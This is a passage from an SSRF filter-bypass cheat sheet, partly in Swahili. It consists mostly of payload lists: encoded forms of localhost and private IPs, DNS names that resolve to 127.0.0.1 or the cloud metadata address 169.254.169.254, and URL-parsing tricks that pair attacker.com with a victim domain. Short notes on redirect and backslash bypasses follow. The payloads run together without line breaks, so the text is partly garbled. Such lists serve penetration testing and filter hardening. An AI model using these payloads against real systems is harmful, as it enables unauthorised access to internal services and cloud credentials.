# Localhosthttp://127.0.0.1:80http://127.0.0.1:443http://127.0.0.1:22http://127.1:80http://127.000000000000000.1http://0http:@0/-->http://localhost/http://0.0.0.0:80http://localhost:80http://[::]:80/http://[::]:25/SMTPhttp://[::]:3128/Squidhttp://[0000::1]:80/http://[0:0:0:0:0:ffff:127.0.0.1]/thefilehttp://①②⑦.⓪.⓪.⓪# CDIR bypasshttp://127.127.127.127http://127.0.1.3http://127.0.0.0# Dot bypass127。0。0。1127%E3%80%820%E3%80%820%E3%80%821# Decimal bypasshttp://2130706433/=http://127.0.0.1http://3232235521/=http://192.168.0.1http://3232235777/=http://192.168.1.1# Octal Bypasshttp://0177.0000.0000.0001http://00000177.00000000.00000000.00000001http://017700000001# Hexadecimal bypass127.0.0.1=0x7f000001http://0x7f000001/=http://127.0.0.1http://0xc0a80014/=http://192.168.0.200x7f.0x00.0x00.0x010x0000007f.0x00000000.0x00000000.0x00000001# Add 0s bypass127.000000000000.1# You can also mix different encoding formats# https://www.silisoftware.com/tools/ipconverter.php# Malformed and rarelocalhost:+11211aaalocalhost:00011211aaaahttp://0/http://127.1http://127.0.1# DNS to localhostlocaltest.me=127.0.0.1customer1.app.localhost.my.company.127.0.0.1.nip.io=127.0.0.1mail.ebc.apple.com=127.0.0.6 (localhost)127.0.0.1.nip.io=127.0.0.1 (Resolves tothegivenIP)www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us=Resolvestowww.google.comhttp://customer1.app.localhost.my.company.127.0.0.1.nip.iohttp://bugbounty.dod.network=127.0.0.2 (localhost)1ynrnhl.xip.io==169.254.169.254spoofed.burpcollaborator.net=127.0.0.1
The Burp extensionBurp-Encode-IP inatekeleza njia za kupita muundo wa IP.
# Try also to change attacker.com for 127.0.0.1 to try to access localhost# Try replacing https by http# Try URL-encoded charactershttps://{domain}@attacker.comhttps://{domain}.attacker.comhttps://{domain}%6D@attacker.comhttps://attacker.com/{domain}https://attacker.com/?d={domain}https://attacker.com#{domain}https://attacker.com@{domain}https://attacker.com#@{domain}https://attacker.com%23@{domain}https://attacker.com%00{domain}https://attacker.com%0A{domain}https://attacker.com?{domain}https://attacker.com///{domain}https://attacker.com\{domain}/https://attacker.com;https://{domain}https://attacker.com\{domain}/https://attacker.com\.{domain}https://attacker.com/.{domain}https://attacker.com\@@{domain}https://attacker.com:\@@{domain}https://attacker.com#\@{domain}https://attacker.com\anything@{domain}/https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com# On each IP position try to put 1 attackers domain and the others the victim domainhttp://1.1.1.1&@2.2.2.2#@3.3.3.3/#Parameter pollutionnext={domain}&next=attacker.com
Paths and Extensions Bypass
Ikiwa unahitajika kwamba URL lazima iishe katika njia au kiambatisho, au lazima iwe na njia unaweza kujaribu moja ya bypass zifuatazo:
The tool recollapse inaweza kuunda tofauti kutoka kwa ingizo lililotolewa ili kujaribu kupita regex inayotumika. Angalia hii posti pia kwa maelezo zaidi.
Bypass via redirect
Inaweza kuwa inawezekana kwamba seva inachuja ombio la asili la SSRF lakini si jibu la redirect kwa ombi hilo.
Kwa mfano, seva iliyo hatarini kwa SSRF kupitia: url=https://www.google.com/ inaweza kuwa inachuja paramu ya url. Lakini ikiwa unatumia seva ya python kujibu na 302 kwa mahali unapotaka kuelekeza, unaweza kuwa na uwezo wa kufikia anwani za IP zilizochujwa kama 127.0.0.1 au hata protokali zilizochujwa kama gopher.
Angalia ripoti hii.
The backslash-trick inatumia tofauti kati ya WHATWG URL Standard na RFC3986. Wakati RFC3986 ni mfumo wa jumla wa URIs, WHATWG ni maalum kwa URLs za wavuti na inakubaliwa na vivinjari vya kisasa. Tofauti kuu iko katika kutambuliwa kwa backslash (\) kama sawa na forward slash (/) katika kiwango cha WHATWG, ikihusiana na jinsi URLs zinavyosomwa, hasa ikionyesha mpito kutoka kwa jina la mwenyeji hadi njia katika URL.